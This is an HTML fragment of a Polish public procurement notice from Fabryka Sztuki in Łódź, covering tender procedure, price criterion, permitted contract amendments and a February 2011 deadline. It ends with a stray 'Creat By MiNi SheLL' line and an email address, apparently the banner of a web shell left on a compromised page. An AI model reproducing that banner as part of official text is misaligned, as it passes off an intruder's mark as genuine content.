<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzenia zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy - tj. Inwestora Zastępczego, jeżeli zmiany te będą konieczne z uwagi na:
a) zmiany obowiązującej stawki VAT,
b) wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu zamówienia (np. klęski żywiołowe, warunki atmosferyczne odbiegające od typowych i uniemożliwiające prowadzenie robót, strajk generalny lub lokalny),
c) zmian uzasadnionych okolicznościami, o których mowa w art. 357 Kodeksu cywilnego,
d) konieczność dostosowania terminu realizacji zamówienia objętego niniejszym postępowaniem do terminu realizacji umowy o roboty budowlane na wykonanie Inwestycji, co nastąpi na wniosek Inwestora Zastępczego, a zmiana terminu, o ile będzie uzasadniona, obejmować będzie okres niezbędny do zakończenia wykonywania przedmiotu Umowy,
e) zmianę formy zabezpieczenia należytego wykonania umowy w oparciu o art.149 Ustawy Pzp,
f) warunki narzucone Zamawiającemu przez Urząd Miasta Łodzi, Instytucję Zarządzającą, Instytucję Pośredniczącą, Samorząd Województwa Łódzkiego, przy czym Inwestor Zastępczy zobowiązany jest do ich zaakceptowania, a stosowna zmiana Umowy będzie obejmować w całości te uwarunkowania i następstwa z nich wynikające,
g) zmiany każdej z osób wymienionych w § 15 ust. 2 Umowy (będącej załącznikiem nr 5 do SIWZ) w przypadkach losowych, przy czym nowa osoba musi mieć kwalifikacje oraz doświadczenie nie mniejsze niż osoba dotychczas wykonująca prace.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.fabrykasztuki.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Fabryka Sztuki w Łodzi, ul. Tymienieckiego 3, 90-365 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2011 godzina 12:00, miejsce: Fabryka Sztuki w Łodzi, ul. Tymienieckiego 3, 90-365 Łódź, pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com